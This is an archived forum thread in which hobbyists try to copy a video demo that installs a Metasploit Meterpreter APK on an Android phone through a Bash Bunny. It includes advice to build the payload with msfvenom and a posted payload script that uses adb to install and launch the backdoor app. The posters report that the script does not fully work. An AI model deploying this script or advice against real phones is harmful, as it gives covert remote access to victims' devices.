Harold Finch Posted February 6, 2018 Share Posted February 6, 2018 Hi dear friends. I watched to this video. But I dont know, which payload he was use in this video. So, what do you think about it? Which payload must be it? Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted February 7, 2018 Share Posted February 7, 2018 I've seen a variation of this one before but I can't remember what it was called - though it was mainly used for Android TVs that had cameras and things in-built. Link to comment Share on other sites More sharing options...
GermanNoob Posted February 8, 2018 Share Posted February 8, 2018 just looked until minute 2... Seems like there is only a meterpreter shell started on the device.... So just create a meterpreter shell with msfvenom, execute it on the phone and receive the connection on your metasploit computer. Link to comment Share on other sites More sharing options...
Harold Finch Posted February 9, 2018 Author Share Posted February 9, 2018 12 hours ago, GermanNoob said: just looked until minute 2... Seems like there is only a meterpreter shell started on the device.... So just create a meterpreter shell with msfvenom, execute it on the phone and receive the connection on your metasploit computer. I did it. I created payload.apk but I cant install it to my android phone with bash bunny.... Where I'm wrong, I dont know. This is attackmode commands in payload.txt : ATTACKMODE HID source /bin/bunny_helpers.sh if [ -z "{$TARGET_IP}" ]; then LED R 2000 exit 1 fi adb connect ${TARGET_IP} adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" LED G Link to comment Share on other sites More sharing options...
GermanNoob Posted February 9, 2018 Share Posted February 9, 2018 Sorry, I never worked really with android, so I don't know adb at all. Have you checked within the logs of adb which commands work or don't work? I'm also not sure if you need to install the msf payload. Is a elf file not allowed to run on android? Edit: Uh, that hurts... I oversaw the obvious problem: You are using the wrong ATTACKMODE. The target will not get any IP as the you aren't using an ethernet attack... And obviously you aren't using QUACK commands, so ATTACKMODE HID seems not to be needed... Link to comment Share on other sites More sharing options...
DanMon Posted March 29, 2018 Share Posted March 29, 2018 what IP adress i should write on $(TARJET_IP) or it doesn't change?? forgive my english, i speak spanish Link to comment Share on other sites More sharing options...
InfoSecREDD Posted April 1, 2018 Share Posted April 1, 2018 I'm personally rewriting this script, going to try and make it accessible for Android 6+ (Marshmallow). So far I have the script rewrote, just having issues with IP's.. I'll keep everyone posted within the week on whats going on. (Side Note - I just got Zelda: Breath of the Wild, so forgive the absence.. Everyone needs a break from every now and then.) -Ar1k88 Link to comment Share on other sites More sharing options...
JediMasterX Posted April 21, 2018 Share Posted April 21, 2018 On 4/2/2018 at 1:16 AM, Ar1k88 said: I'm personally rewriting this script, going to try and make it accessible for Android 6+ (Marshmallow). So far I have the script rewrote, just having issues with IP's.. I'll keep everyone posted within the week on whats going on. (Side Note - I just got Zelda: Breath of the Wild, so forgive the absence.. Everyone needs a break from every now and then.) -Ar1k88 well... ? still waiting JMX Link to comment Share on other sites More sharing options...
InfoSecREDD Posted April 21, 2018 Share Posted April 21, 2018 Haha, I stopped at trying to get adb access to allow the BashBunny to push files.. I can get it to install, but not run.. something with how the BashBunny sends the adb command to the ADB protocol.. But I got sidetracked, been developing a website to allow Cryptocurrency to be held for super cheap.. Ugh I got so many things going on.. ? Link to comment Share on other sites More sharing options...
LowValueTarget Posted April 23, 2018 Share Posted April 23, 2018 In order to work with ADB, the BashBunny needs to be a Host -- currently , there is no way to make the BB run as a host afaik. Link to comment Share on other sites More sharing options...
InfoSecREDD Posted April 23, 2018 Share Posted April 23, 2018 13 minutes ago, LowValueTarget said: In order to work with ADB, the BashBunny needs to be a Host -- currently , there is no way to make the BB run as a host afaik. Idk what you're talking about BashBunny is running ADB perfectly fine.. Link to comment Share on other sites More sharing options...
LowValueTarget Posted April 23, 2018 Share Posted April 23, 2018 11 minutes ago, Ar1k88 said: Idk what you're talking about BashBunny is running ADB perfectly fine.. It's connecting to the phone? Of course ADB will run -- but will it connect? Link to comment Share on other sites More sharing options...
InfoSecREDD Posted April 23, 2018 Share Posted April 23, 2018 It runs no problem.. can push a apk, and install it.. BUT the syntax for running the apk after install is giving issues.. Link to comment Share on other sites More sharing options...
LowValueTarget Posted April 23, 2018 Share Posted April 23, 2018 Interesting -- good to know. Link to comment Share on other sites More sharing options...
InfoSecREDD Posted April 23, 2018 Share Posted April 23, 2018 3 minutes ago, LowValueTarget said: Interesting -- good to know. Of course! I've just been super busy with other projects.. But if anyone needs any help or anything, just message me.. I've been doing crazy 15hour coding stretches so I'm just too exhausted for multiple projects at the moment.. Link to comment Share on other sites More sharing options...
ramirovargas007 Posted August 4, 2018 Share Posted August 4, 2018 ES FACIL Link to comment Share on other sites More sharing options...
HackFUN Posted October 29, 2019 Share Posted October 29, 2019 Dears, What is the exact payload to run for this attack? Please help Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.